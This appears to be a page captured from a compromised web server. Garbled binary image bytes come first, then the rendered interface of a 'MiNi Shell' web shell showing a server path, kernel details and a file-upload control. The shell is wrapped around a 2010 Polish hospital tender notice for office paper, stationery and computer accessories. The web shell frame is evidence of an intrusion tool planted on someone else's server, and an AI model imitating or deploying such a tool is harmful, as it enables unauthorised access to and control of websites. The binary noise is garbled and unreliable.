JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101008/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101008/279765-N-2010.html

<p class="kh_header"><b>Tarnów: Zakup i dostawa sukcesywna : papier kserograficzny, materiały biurowe, artykuły komputerowe  przez okres 12 miesięcy od dnia podpisania umowy.</b><br>
<b>Numer ogłoszenia: 279765 - 2010; data zamieszczenia: 08.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wojewódzki im. św. Łukasza SPZOZ , ul. Lwowska 178a, 33-100 Tarnów, woj. małopolskie, tel. 014 6315460, faks 014 6315460, 6212581.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa sukcesywna : papier kserograficzny, materiały biurowe, artykuły komputerowe  przez okres 12 miesięcy od dnia podpisania umowy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakup i dostawa sukcesywna : papier kserograficzny, materiały biurowe, artykuły komputerowe  przez okres 12 miesięcy od dnia podpisania umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.44-2, 30.19.00.00-7, 30.23.72.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Pełnomocnictwo do podpisania oferty i składania ewentualnych wyjaśnień, jeżeli osoba podpisująca nie jest osoba upoważnioną na podstawie odpisu z Krajowego Rejestru Sadowego. Jeżeli ofertę podpisuje osoba fizyczna celem weryfikacji należy dołączyć zaświadczenie o wpisie do ewidencji działalności gospodarczej. Jeżeli dołączone do oferty ww. pełnomocnictwo będzie w formie kopii, Zamawiający wymaga, aby jego zgodność z oryginałem poświadczyła osoba wymieniona w rejestrze, która jest wskazana, jako upoważniona do reprezentowania Wykonawcy lub notariusz.
2) oświadczenie w trybie art. 22 ust.1 ustawy PZP  (załącznik nr 2 do SIWZ).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W trakcie trwania umowy możliwa jest zmiana cen tylko w przypadku zmiany: 
- zmiany stawki podatku VAT, przy czym zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lukasz.med.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SZPITAL WOJEWÓDZKI IM. ŚW. ŁUKASZA W TARNOWIE SAMODZIELNYM PUBLICZNY ZAKŁADZIE OPIEKI ZDROWOTNEJ 33-100 TARNÓW, UL. LWOWSKA 178A (pawilon D II piętro) Dział Logistyki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2010 godzina 10:00, miejsce: SZPITAL WOJEWÓDZKI IM. ŚW. ŁUKASZA W TARNOWIE SAMODZIELNYM PUBLICZNY ZAKŁADZIE OPIEKI ZDROWOTNEJ 33-100 TARNÓW, UL. LWOWSKA 178A (pawilon D II piętro) Kancelaria Ogólna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 17.11.2010.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakres 1 - Papier kserograficzny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres 1 - Papier kserograficzny
1.Papier ksero Polspeed A-4 80g/m2  lub równoważny	  Ryz	  5.000      
2.Papier ksero Polspeed A-3 80g/m2  lub równowazny	  Ryz	400
3.Papier ksero Polux A-4   80g/m2 	  Ryz	60
4.Papier ksero A-4 80g/m2      (kolor zielony groszek)   	  Ryz	8
5.	Papier ksero A-4 80g/m2      (kolor czerwony jasny)	  Ryz	8
6.	Papier ksero A-4  80g/m2 (kolor żółty )	  Ryz	8
7.	Papier ksero A-4 80g/m2      (kolor  kremowy)	  Ryz	8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.44-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakres 2 - Artykuły biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres 2 - Artykuły biurowe
1.	Rolka kasowa offsetowa (szer. 57 mm , długość 25 m)	rol.	60
2.	Numerator 6 cyfrowy Reiner B 6K	szt.	2
3.	Tablica sucho-ścieralna   45 x 60	szt.	5
4.	 Klej biurowy w sztyfcie Baton de colle 25 - 30  ml	szt.	250
5.	Spinacze biurowe małe  (a 100 )	opak.	1200
6.	Spinacze biurowe  duże (a 50)	opak.	150
7.	Kalka ołówkowa   A - 3	szt.	2
8.	Kieszeń przeźroczysta na dokumenty  A- 4 (L)	szt.	1000
9.	Datownik  Trodat	szt.	50
10.	Linijka biurowa  30 - 40 cm ( kolorowe)	szt.	40
11.	Zeszyt kratka (twarda oprawa)  A - 4	szt.	400
12.	Zeszyt kratka  96 kart. (twarda oprawa)  A - 5	szt.	300
13.	Zeszyt kratka  80 kart.                        A - 5	szt.	300
14.	Zeszyt kratka  60 kart.                        A - 5	szt.	300
15.	Zeszyt kratka  32 kart.                        A - 5	szt.	300
16.	Zeszyt kratka  16 kart.                        A - 5	szt.	300
17.	Blok z makulatury                              A - 5	szt.	500
18.	Blok z makulatury                              A - 4	szt.	500
19.	Taśma klejąca bezbarwna  (19 x 30)	rol.	2000
20.	Taśma klejąca szeroka  - szara	rol.	2000
21.	Ołówek  HB  z gumką  techniczny	szt.	200
22.	Segregator  Esselte  ( szeroki)         A - 4	szt.	800
23.	Segregator  Esselte  (wąski)            A - 4	szt.	400
24.	Segregator  (szeroki)                           A - 5	szt.	300
25.	Teczka tekturowa z gumką                 A - 4	szt.	500
26.	Teczka plastikowa wiązana                A - 4	szt.	500
27.	Teczka tekturowa zawieszkowa         A - 4                                    - teczka winna być wykonana solidnie, nie pękające blaszki po paru odgięciach, elelment zewnetrzny ( blaszany) na teczce do wpinania w segregatorze dobrze przymocowany	szt.	2000
28.	Teczka tekturowa wiązana                 A - 4	szt.	500
29.	Pisak Marker suchościeralny kolorowe (a 4) z gąbką	kpl.	50
30.	Korektor biurowy w taśmie Tipp-Ex Delete	szt.	100
31.	Nożyczki biurowe	szt.	150
32.	Koperta  biała  (a 250)                      A - 4	opak.	10
33.	Koperta szara  ( a 50) z paskiem HK      A - 4	opak.	1400
34.	Koperta szara ( a 50)  z paskiem  HK     A - 5	opak.	400
35.	Koperta szara  (a 1000)                     A - 6	opak.	5
36.	Koperta listowa biała  ( a 100)          A - 6	opak.	150
37.	Pinezki  długie kolorowe	szt.	20
38.	Zszywacz biurowy  (standard)	szt.	150
39.	Zszywki biurowe zwykłe (do wyżej wymienionego  zszywacza)	opak.	1500
40.	Teczka twar. z kliperem(z przednią zasł.) A-4	szt.	100
41.	Wąsy do skoroszytów (a 25)	opak.	30
42.	Pisak czarny do tablic sucho-ścieralny Marker	szt.	150
43.	Cienkopis czarny	szt.	250
44.	Cienkopis czerwony	szt.	150
45.	Pisak czarny - zwykły	szt.	150
46.	Tusz do pieczątek czarny Noris	szt.	100
47.	Tusz do pieczątek czerwony Noris	szt.	30
48.	Tusz do pieczątek zielony Noris	szt.	20
49.	Dziurkacz   biurowy  średni	szt.	70
50.	Taśma biała  przylepna  Gęsia skórka	rol.	40
51.	Koszulka  - ofertówka  (a100)    A - 4            (do wpinania )	opak.	300
52.	Papier do faxu  210 x 30 x ?	rol.	180
53	Pisak czarny wodoodporny Marker	szt.	2200
54.	Pisak Marker Foliopis (do opisu na szkle, plastiku)	szt.	300
55.	Oprawki do identyfikatorów	szt.	200
56.	Przekładki do segregatora A-4 (litery) 	kpl.	4
57.	Teczka  plastikowa zawieszkowa ( przód  przeźroczysty )  A - 4	szt.	2500
58.	Długopis   niebieski  Pentel  BK77	szt.	500
59.	Długopis   czarny  Pentel BK77	szt.	100
60.	Długopis  czerwony  Pentel BK77	szt.	100
61.	Długopis  zielony  Pentel  BK77	szt.	100
62.	Długopis  fioletowy Pentel BK77	szt.	50
63.	Koperta próżniowa biała  A - 4 16F	szt.	50
64.	Koperta próżniowa biała  A - 5 14D	szt.	100
65.	Przekładki do segregatora A-4  (cyferki) 1-31	Kpl.	4
66.	Temperówka szkolna (metalowa)	szt.	20
67.	Gumka biurowa do mazania 	szt.	40
68.	Rolka  kasowa termoczuła (57 mm x 25 m) 	rol.	50
69.	Pisak biały Marker gruby nie rozpuszczalny w  alkoholu	szt.	20
70.	Pisak czarny Marker  gruby nie rozpuszczalny w alkoholu	szt.	20
71.	Pisak biały  Marker cienki nie rozpuszczalny  w alkoholu	szt.	20
72.	Pisak czarny  Marker cienki nie  rozpuszczalny w alkoholu 	szt.	20
73.	Folia do laminowania  (a 100)           A - 4	opak.	10
74.	Poduszka do pieczątek mała 	szt.	5
75.	Folia aluminiowa ( 20 mb)	rol.	300
76.	Papier pakunkowy biały - pół-pergaminowy	kg.	40
77.	Rozszywacz  dokumentów 	szt.	30
78.	Koperta szara  RTG                 ( 37 x 45)	szt.	25000
79.	Papier komputerowy  360 ( 1 + 0 )	opak.	3
80.	Papier komputerowy  240  (1 + 2)	opak.	10
81.	Papier komputerowy  240  (1 + 0)	opak.	20
82.	Papier komputerowy  240  (1 + 1)	opak.	20
83.	Papier komputerowy  360  (1 + 1)	opak.	3
84.	Zakreślacz  kolorowy	szt.	200
85.	Torebki papierowe spożywcze - białe (1 kg)	kg.	15
86.	Folia spożywcza           (0,30 x 300 m)	rol.	30
87.	Skorowidz alfabetyczny  A - 4	szt. 	30
88.	Skorowidz alfabetyczny  A - 5	szt.	20
89.	Koperta szara  (a 250)    B - 4	opak.	250
90.	Pisak biały olejny cienki Marker (okrągły)	szt.	20
91	Pisak czarny olejny gruby Marker	szt.	20
92	Pisak czarny olejny cienki Marker	szt.	20
93.	Pisak  biały olejny  gruby Marker (okrągły)	szt.	20
94.	Serwetki gastronomiczne  białe  (a 500)	opak.	120
95.	Segregator  wąski   A-5	szt.	20
96.	Teczka - skoroszyt zwykły  tekturowy A-4	szt.	200
97.	Długopis żelowy  czarny	szt.	100
98.	Długopis żelowy  niebieski	szt.	100
99.	Kalka ołówkowa (a 50)  A-4	szt.	30
100.	Klej biurowy  w  płynie 	szt.	100
101.	Półka biurowa plastikowa na dokumenty	szt.	100
102.	Przybornik biurowy  (na biurko)	szt.	10
103.	Papier do flipcharta  gładki  (a 40 ark)	szt.	30
104.	Etykiety samoprzylepne białe na arkuszu A-4                      (nacinane na wymiar 7 x 3,5 cm)  (a 100)	opak.	30
105.	Klej biurowy w tubce 	szt.	50
106.	Cienkopis wodoodporny czarny	szt.	40
107.	Cienkopis wodoodporny czerwony	szt.	40
108.	Cienkopis wodoodporny niebieski	szt.	40
109.	Tusz kreślarski czarny Perła 35 ml	szt.	20
110.	Folia do kserokopiarki  A-4  (a 100)	szt.	4
111.	Blok techniczny  A-4	szt.	20
112.	Pędzelki cienkie do farbek	szt.	40
113.	Pędzelki grube  Astra  20 	szt.	20
114.	Pisak czerwony - zwykły	szt.	150
115.	Skorowidz alfabetyczny  ?  A-4	szt.	10
116.	Taśma  klejąca szeroka  bezbarwna 	rol.	50
117.	Pisak niebieski wodoodporny Marker	szt.	500
118.	Koperta biała  (a 50)  A-5	opak.	50
119.	Bloczki kolorowe (kostka) samoprzylepne     (7,5 x 7,5 cm)	szt.	50
120.	Bloczki kolorowe samoprzylepne do znakowania dokumentów (szer. ok. 1 cm )	szt.	50
121.	Nóż do cięcia papieru - tapet	szt.	10
122.	Pisaki kolorowe  (6 kolorów)	kpl.	20
123.	Pisak zielony zwykły 	szt.	100
124.	Koszulka ofertówka  (a 100)  A-5  (do wpinania )	opak.	20
125.	Okładka  do bindowania  A-4  - przód (a 100)	opak.	10
126.	Okładka do bindowania  A-4 - tył  (a 100)	opak.	10
127.	Grzbiety do bindowania  O 15  ( a 100)	opak.	10
128.	Pisak wodoodporny Staedtler permanent Lumocolor          gr. 1,0 mm M czarne	szt.	150
129.	Pisak wodoodporny Staedtler permanent Lumocolor           gr. 1,0 mm M czerwone	szt.	150
130.	Pisak wodoodporny Staedtler permanent Lumocolor          gr. 1,0 mm M niebieskie	szt.	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakres 3 - Akcesoria komputerowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres 3 - Akcesoria komputerowe
1.Mysz komputerowa optyczna: złącze: PS2; - rozdzielczość CPI DPI: 800, - liczba przycisków: 4 ( w tym dodatkowy przycisk 2x Click); - liczba rolek: 1; kolor: czarny; Gwarancja producenta: 36 miesiecy	szt.	300
2.Mysz komputerowa optyczna:                                                        - złącze USB; rozdzielczość CPI  DPI 800; liczba przycisków 4   ( w tym dodatkowy przycisk 2x Click; liczba rolek 1; - gwarancja producenta: 36 m-cy	szt.	50
3.	Myszka do komputera RS-232 ( wtyk płaski)	szt.	5
4.	Podkładka żelowa po mysz komputerową	szt.	40
5.	Klawiatura komputerowa:                                                              - złącze PS 2; - typ klawiatury Standard;  - układ klawiszy klasyczny; - gwarancja producenta 24 m-ce	szt.	50
6.	Klawiatura komputerowa:                                                              - złącze USB; - typ klawiatury slim;  - układ klawiszy klasyczny; - gwarancja producenta 24 m-ce	szt.	20
7.	Płyty CD-R 700 MB 52x ( Slim CASE)       Verbatin	szt.	8000
8.	Płyty DVD+R  4,7 GB 16x ( Slim CASE)       Verbatin	szt.	1700
9.	Płyty DVD+R  8,5 GB  2,4x ( Double Layer)       EMTEC	szt.	100
10.	Płyty DVD +RW 4,7 GB up to 4,00x speed	szt.	5000
11.	Dyskietki Verbatim (a 10)	op.	200
12.	Pudełka na płyty CD-R (a 50)	szt.	15
13.	Nagrywarka DVD Double Layer:                                                 - wielkość bufora (MB) 2MB; - typ interfejsu Serial ATA;           - zgodność ze standardem SecureDisc: tak; gwarancja producenta 24 m-ce	szt.	2
14.	Nośnik taśmowy do archiwizacji danych o pojemności pamięci 400 GB w technologii nagrywania LTO Ultrium 2 ( taśma HP Ultrium 400 GB ( C7972A) 	szt.	6
15.	Kabel USB A-B M/M 2.0 1,8 m	szt.	50
16.	Kabel USB A-B M/M 2.0 3,0 m	szt.	20
17.	Wentylator komputerowy 50x50 mm	szt.	10
18.	Wentylator komputerowy 70x70 mm	szt.	10
19.	Wentylator komputerowy 80x80 mm	szt.	10
20.	Listwa zabezpieczająca 3,0 m 5 gniazd	szt.	160
21.	8 - portowy przełącznik 10/100/1000 Mb/s:                                   - Auto MDI/MDIX na wszystkich portach;  - gwaracnja producenta 24 m-ce	szt.	20
22.	Kabel UTP 305m Kat. 5e	szt.	20
23.	Patchcord UTP kat. 5e 2x RJ45 zółty 0,5 m	szt.	100
24.	Patchcord UTP kat. 5e 2x RJ45 szary 1,5 m	szt.	50
25.	Wtyk RJ45 UTP kat. 5e (a 100)	opak.	10
26.	Zestaw czyszczący do monitorów LCD:                                          - płyn czyszczący w atomizerze;  - ścierka wykonana z mikrowłókna; - antystatyczny pedzel do usuwania kurzu i zabrudzeń z ekranu i klawiatury	szt.	2
27.	Zasilacz komputerowy 400W ATX	szt.	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.72.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com